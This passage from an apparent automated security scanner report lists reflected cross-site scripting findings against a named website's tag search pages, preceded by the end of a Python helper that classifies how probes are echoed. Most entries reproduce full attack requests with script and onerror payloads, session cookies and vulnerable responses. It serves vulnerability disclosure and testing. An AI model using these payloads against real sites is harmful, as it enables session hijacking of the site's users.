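    elif html.unescape(echoed) == probe:
        status = "encoded"      # entity-encoded on output: inert markup
    else:
        status = "mangled"      # filtered, truncated or otherwise altered

    # Inside <title> the browser treats content as RCDATA: tags stay text
    # until a literal </title> appears, so a payload there only executes
    # if it closes the element first.
    head = body[:start].lower()
    in_title = head.rfind("<title") > head.rfind("</title>")
    context = "title" if in_title else "text"
    executes = status == "raw" and (not in_title or "</title>" in probe.lower())
    return Reflection(status, context, executes)


IMG_PROBE = "<img src=a onerror=alert(1)>"

# Response fragments quoted from the first two issues above; the snipped
# <title> of the second fragment is closed here so the sample is well-formed.
TITLE_BODY = (
    "<title>Browse by Tag: themes/kosmos/images/rating/5.gif"
    "7a72a</title><img src=a onerror=alert(1)>49f93810925</title>"
)
TEXT_BODY = (
    "<title>Browse by Tag: theme</title></head><body>"
    '<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : '
    "themes/kosmos/images/rating/5.gif1da2c<img src=a onerror=alert(1)>43babaab3a7]</td>"
)
# Constructed counter-cases: the same probe left inside TITLE with no
# breakout, and the same probe after the entity encoding a fix would apply.
INERT_BODY = "<title>Browse by Tag: 1da2c" + IMG_PROBE + "43babaab3a7</title>"
FIXED_BODY = "<title>Browse by Tag: 1da2c" + html.escape(IMG_PROBE) + "43babaab3a7</title>"


if __name__ == "__main__":
    cases = [
        ("title, with </title> breakout", TITLE_BODY, "7a72a", "</title>" + IMG_PROBE, "49f93810925"),
        ("text between tags", TEXT_BODY, "1da2c", IMG_PROBE, "43babaab3a7"),
        ("title, no breakout", INERT_BODY, "1da2c", IMG_PROBE, "43babaab3a7"),
        ("entity-encoded (fixed)", FIXED_BODY, "1da2c", IMG_PROBE, "43babaab3a7"),
    ]
    for name, body, pre, probe, suf in cases:
        print(f"{name:32} -> {classify(body, pre, probe, suf)}")
```

Only the first two cases come back with executes=True, which is exactly the report's pair of findings; the third shows why the scanner had to prepend </title> for the title context, and the fourth shows that entity encoding the value at output turns the same reflection into inert text.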

2.4518. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5689<script>alert(1)</script>8ac556ababf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note where the reflection occurs: altering the first path segment (tag) makes the route invalid, and the response is the site's own 404 page (HTTP/1.0 404 Not Found, generated by PHP according to the X-Powered-By header), which writes the requested URL into a P element without encoding it. A 404 status does not stop a browser from rendering the body, so the SCRIPT tag executes regardless; the injection point here is the error page's echo of the request URI rather than the tag listing itself.

Request

GET /tage5689<script>alert(1)</script>8ac556ababf/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage5689<script>alert(1)</script>8ac556ababf/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4519. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2380e<script>alert(1)</script>6a8d35e746bdffebf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag2380e<script>alert(1)</script>6a8d35e746bdffebf/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2380e<script>alert(1)</script>6a8d35e746bdffebf/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4520. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c37ac</title><img%20src%3da%20onerror%3dalert(1)>063d5072d4b7986bf was submitted in the REST URL parameter 2. This input was echoed as c37ac</title><img src=a onerror=alert(1)>063d5072d4b7986bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themesc37ac</title><img%20src%3da%20onerror%3dalert(1)>063d5072d4b7986bf/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themesc37ac</title><img src=a onerror=alert(1)>063d5072d4b7986bf/kosmos/images/rating/search.php</title>
...[SNIP]...

2.4521. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6dda8<img%20src%3da%20onerror%3dalert(1)>9c4d7d9d967aad295 was submitted in the REST URL parameter 2. This input was echoed as 6dda8<img src=a onerror=alert(1)>9c4d7d9d967aad295 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes6dda8<img%20src%3da%20onerror%3dalert(1)>9c4d7d9d967aad295/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes6dda8<img src=a onerror=alert(1)>9c4d7d9d967aad295/kosmos/images/rating/search.php]</td>
...[SNIP]...

2.4522. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c692<img%20src%3da%20onerror%3dalert(1)>1c3cfaef56c was submitted in the REST URL parameter 2. This input was echoed as 1c692<img src=a onerror=alert(1)>1c3cfaef56c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes1c692<img%20src%3da%20onerror%3dalert(1)>1c3cfaef56c/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes1c692<img src=a onerror=alert(1)>1c3cfaef56c/kosmos/images/rating/search.php]</td>
...[SNIP]...

2.4523. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload cdad0</title><img%20src%3da%20onerror%3dalert(1)>856068db0e1 was submitted in the REST URL parameter 2. This input was echoed as cdad0</title><img src=a onerror=alert(1)>856068db0e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themescdad0</title><img%20src%3da%20onerror%3dalert(1)>856068db0e1/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themescdad0</title><img src=a onerror=alert(1)>856068db0e1/kosmos/images/rating/search.php</title>
...[SNIP]...

2.4524. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 98745</title><img%20src%3da%20onerror%3dalert(1)>40c87104ecf was submitted in the REST URL parameter 3. This input was echoed as 98745</title><img src=a onerror=alert(1)>40c87104ecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos98745</title><img%20src%3da%20onerror%3dalert(1)>40c87104ecf/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos98745</title><img src=a onerror=alert(1)>40c87104ecf/images/rating/search.php</title>
...[SNIP]...

2.4525. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bbb5a</title><img%20src%3da%20onerror%3dalert(1)>a5413992da972fd5e was submitted in the REST URL parameter 3. This input was echoed as bbb5a</title><img src=a onerror=alert(1)>a5413992da972fd5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmosbbb5a</title><img%20src%3da%20onerror%3dalert(1)>a5413992da972fd5e/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmosbbb5a</title><img src=a onerror=alert(1)>a5413992da972fd5e/images/rating/search.php</title>
...[SNIP]...

2.4526. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d211<img%20src%3da%20onerror%3dalert(1)>2d6954f527c was submitted in the REST URL parameter 3. This input was echoed as 7d211<img src=a onerror=alert(1)>2d6954f527c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos7d211<img%20src%3da%20onerror%3dalert(1)>2d6954f527c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos7d211<img src=a onerror=alert(1)>2d6954f527c/images/rating/search.php]</td>
...[SNIP]...

2.4527. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4f78f<img%20src%3da%20onerror%3dalert(1)>f1efa78ff7ce46ef7 was submitted in the REST URL parameter 3. This input was echoed as 4f78f<img src=a onerror=alert(1)>f1efa78ff7ce46ef7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos4f78f<img%20src%3da%20onerror%3dalert(1)>f1efa78ff7ce46ef7/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos4f78f<img src=a onerror=alert(1)>f1efa78ff7ce46ef7/images/rating/search.php]</td>
...[SNIP]...

2.4528. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f495d<img%20src%3da%20onerror%3dalert(1)>336c2815c99b6610b was submitted in the REST URL parameter 4. This input was echoed as f495d<img src=a onerror=alert(1)>336c2815c99b6610b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/imagesf495d<img%20src%3da%20onerror%3dalert(1)>336c2815c99b6610b/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/imagesf495d<img src=a onerror=alert(1)>336c2815c99b6610b/rating/search.php]</td>
...[SNIP]...

2.4529. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload f0bc1</title><img%20src%3da%20onerror%3dalert(1)>f63a3184c1ea17175 was submitted in the REST URL parameter 4. This input was echoed as f0bc1</title><img src=a onerror=alert(1)>f63a3184c1ea17175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/imagesf0bc1</title><img%20src%3da%20onerror%3dalert(1)>f63a3184c1ea17175/rating/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesf0bc1</title><img src=a onerror=alert(1)>f63a3184c1ea17175/rating/search.php</title>
...[SNIP]...

2.4530. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload f9a91</title><img%20src%3da%20onerror%3dalert(1)>6ecf719be24 was submitted in the REST URL parameter 4. This input was echoed as f9a91</title><img src=a onerror=alert(1)>6ecf719be24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesf9a91</title><img%20src%3da%20onerror%3dalert(1)>6ecf719be24/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesf9a91</title><img src=a onerror=alert(1)>6ecf719be24/rating/search.php</title>
...[SNIP]...

2.4531. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85881<img%20src%3da%20onerror%3dalert(1)>c35bab690b2 was submitted in the REST URL parameter 4. This input was echoed as 85881<img src=a onerror=alert(1)>c35bab690b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images85881<img%20src%3da%20onerror%3dalert(1)>c35bab690b2/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images85881<img src=a onerror=alert(1)>c35bab690b2/rating/search.php]</td>
...[SNIP]...

2.4532. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

